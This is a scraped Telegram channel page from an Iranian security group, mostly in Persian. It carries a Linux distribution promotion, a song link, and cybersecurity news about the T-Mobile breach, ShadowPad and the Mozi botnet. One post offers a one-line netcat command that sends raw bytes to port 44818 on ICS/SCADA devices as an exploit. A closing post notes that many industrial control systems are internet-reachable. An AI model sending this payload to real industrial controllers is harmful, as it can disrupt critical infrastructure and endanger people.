Unidentified T E A M
1.14K subscribers
212 photos
45 videos
85 files
239 links
~⚘🌹 Just God 🌷~

🇮🇷 Unidentified Security Team 🇮🇷
_________________________________________________
< The Best Cyber Security Team in Iran right now

Support TEAM: @UNIDENTIFIED_TM_bot
Download Telegram
Forwarded from Predator-OS
Predator-OS
📌 Predator OS download https://predator-os.com/down/predator-os-20.04-LTS.iso
بصورت رسمی الان میتونید دانلود کنید و صفا کنید👌🌷
استارت ۳ پروژه بزرگ هم بزودی میخوره فقط محبت کنید تا میتونید توزیع رو به دوست و آشنایان معرفی کنید اینبار حسابی حال دلتون رو جا میاریم بچه های خوب و با سواد سایبری کشور عزیزمان یا حق 🌹
Ey Khasta Par Yarali [Tab-Music.ir]
Mohammad Bagher Mansouri [Tab-Music.ir]
روحت شاد حاج محمدباقر منصوری

نوحه دلسوز تورکی
ای خسته پَر یارالی

@UNIDENTIFIED_TM
سلام
صفحه رای گیری سایت distrowatch برای توزیع predator-os
لطفا رای بدین به توزیع ممنون
=====================
https://distrowatch.com/

بالای سایت قسمت
Submit Distribution
رو کلیک کنید. و در صفحه باز شده قسمت
Projects waiting evaluation:

گزینه submit در مقابل اسم توزیع رو کلیک کنید.

@UNIDENTIFIED_TM
اپراتور T-Mobile هک اطلاعات محرمانه ۴۷ میلیون مشترک خود را تایید کرد

اپراتور T-Mobile اعلام کرده است که تحقیقات داخلی پیرامون حادثه اخیر هنوز در جریان است، اما افشای اطلاعات ۴۷.۸ میلیون کاربر از سوی این شرکت تایید شده است. طبق آخرین گزارش‌های رسمی مالی منتشر شده، اپراتور گفته شده دارای بیش از ۱۰۴ میلیون مشترک است.
@UNIDENTIFIED_TM
#news
یک پلت فرم بد افزار مدولار با نام ShadowPad که به صورت خصوصی فروخته می شود ، مورد علاقه گروه های جاسوسی سایبری چین قرار گرفته است.
این بک دور اصلی بود که در کمپین های جاسوسی متعدد از جمله حملات CCleaner ، NetSarang و ASUS Supply-Chain استفاده می شد.


@UNIDENTIFIED_TM
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد.
محققان مرکز امنیت تهدیدات امنیتی مایکروسافت و بخش 52 در Azure Defender برای IoT در مقاله ای فنی گفتند: "با آلوده کردن روترها ، آنها می توانند حملات man-in-the-middle (MITM)-از طریق ربودن HTTP و جعل DNS-برای به خطر انداختن نقاط پایانی و استقرار باج افزار یا ایجاد حوادث ایمنی در امکانات OT انجام دهند.”

@UNIDENTIFIED_TM
#news
Unidentified T E A M
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد. محققان مرکز امنیت…
According to new findings, Mozi, a peer-to-peer (P2P) botnet targeting IoT devices, has acquired new capabilities that allow it to access the network gateways produced by Netgear. Huawei and ZTE reach longevity.
"By infecting routers, they can launch man-in-the-middle (MITM) attacks - by hijacking HTTP and forging DNS - "Endanger endpoints and install ransomware or create security incidents in OT facilities."

@UNIDENTIFIED_TM
#news
Forwarded from Predator-OS
Media is too big
VIEW IN TELEGRAM
The Tutorial mode in Linux predator-os includes many offline tutorials which will be available to beginners and academy users through this menu.
In this mode, many training files, such as:
*.overview on security
*.Security checklists
*.Cheat sheets. A variety of cheat sheets from Linux, security, hacking, programming languages, etc.
*.Linux shortcut key
*.Quick tutorial and Linux tutorial
*.Quick security training and security tutorial
All the above files are available through the menu in pdf format.
==========
مد آموزشی در لینوکس predator-os شامل آموزشهای زیادی به صورت آفلاین که از طریق این منو برای کاربران تازه کار و آکادمی در دسترس خواهد بود.
در این مد فایل های آموزشی زیادی ازجمله:
معرفی امنیت
چک لیست های امنیتی
برگ های تقلب cheat sheet
کلید میانبرهای لینوکس
آموزش سریع و خود آموز لینوکس
آموزش سریع امنیت
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
https://t.me/predator_os
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
دستور اکسپلویت کردن آسیب پذیری برخی دیوایس های ICS و SCADA روی پورت 44818/TCP


echo -e ”\x00\x00\xE8\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00”
| nc -w 2 <target_IP> 44818 > /dev/null


@UNIDENTIFIED_TM
#payload_exploit
Unidentified T E A M
@UNIDENTIFIED_TM
امنیت سایبری در تاسیسات هسته ای :

لایه های امنیتی در تاسیسات هسته ای به شدت زیاد هستند و دیتاسرور و لایه IT تحت حفاظت DMZ قرار دارند.

ارتباط هر لایه با لایه دیگر قطع میشود، سیستم ها از شبکه نیز جدا هستند و تمام برنامه ها در محیط سندباکس باز میشوند.

2 فایروال در لایه IT قبل از PLC و SCADA وجود دارد.

سیستمی به اسم SCRAM با افزایش دما یا فشار و تغییرات غیرمنتظره راکتور هسته ای را خاموش میکند. تمام اینها باعث برقراری امنیت زیاد و شکست خوردن بسیاری از حملات قبل از رسیدن به مراحل خطرناک می شود.

اما این امنیت بالا فقط در تاسیسات هسته ای صدق میکند، سیستم های کنترل صنعتی در مهم ترین زیرساخت های هر کشوری وجود دارند و تمام منابع و آب،گاز،نفت،برق و ... توسط این سیستم ها کنترل میشود که خیلی از آنها به اینترنت نیز وصل هستند و قابل نفوذ می باشند.

@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team